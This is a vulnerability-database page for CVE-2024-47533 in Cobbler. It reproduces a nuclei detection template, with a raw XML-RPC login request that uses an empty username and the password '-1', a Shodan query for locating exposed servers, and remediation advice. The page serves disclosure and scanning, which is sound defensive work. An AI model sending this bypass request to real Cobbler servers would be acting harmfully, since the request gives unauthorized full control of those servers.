Lucene search
K

Cobbler 'XML-RPC' - Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Cobbler XML-RPC auth bypass lets remote attackers gain full control with empty user and -1 password.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-47533
11 Aug 202520:55
githubexploit
GithubExploit
Exploit for Code Injection in Ispconfig
6 Sep 202502:27
githubexploit
GithubExploit
Exploit for CVE-2024-47533
13 Aug 202501:25
githubexploit
GithubExploit
Exploit for CVE-2024-47533
12 Aug 202515:49
githubexploit
GithubExploit
Exploit for CVE-2024-47533
14 Aug 202505:28
githubexploit
GithubExploit
Exploit for CVE-2024-47533
12 Aug 202513:52
githubexploit
BDU FSTEC
The vulnerability of the Cobbler network installation server, related to deficiencies in authentication procedures, allows attackers to gain full access to the server.
20 Nov 202400:00
bdu_fstec
Circl
CVE-2024-47533
17 Nov 202417:08
circl
CNNVD
Cobbler 授权问题漏洞
18 Nov 202400:00
cnnvd
CVE
CVE-2024-47533
18 Nov 202416:33
cve
Rows per page
id: CVE-2024-47533

info:
  name: Cobbler 'XML-RPC' - Authentication Bypass
  author: songyaeji
  severity: critical
  description: |
    Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
  impact: |
    Anyone with network access can connect to Cobbler XML-RPC with default credentials and make arbitrary changes, gaining full control.
  remediation: |
    Update Cobbler to version 3.2.3 or 3.3.7 or later.
  reference:
    - https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0
    - https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda
    - https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-47533
    cwe-id: CWE-287
    epss-score: 0.03948
    epss-percentile: 0.89149
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Cobbler Web Interface"
  tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc,vuln

http:
  - raw:
      - |
        POST /cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>login</methodName>
          <params>
            <param>
              <value><string></string></value>
            </param>
            <param>
              <value><string>-1</string></value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<methodResponse>"
          - "</string></value>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "<boolean>0</boolean>"
          - "<name>faultString</name>"
        condition: or
        negative: true
# digest: 4a0a00473045022070975f7c13739c0290751ba3f93e8abc217a999203a071922702ec2924a1595b022100b613366386ad79d65281828c98a5519ba8ead1b43c4f5b45a8d4e5fdda509e1a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.03948
SSVC
21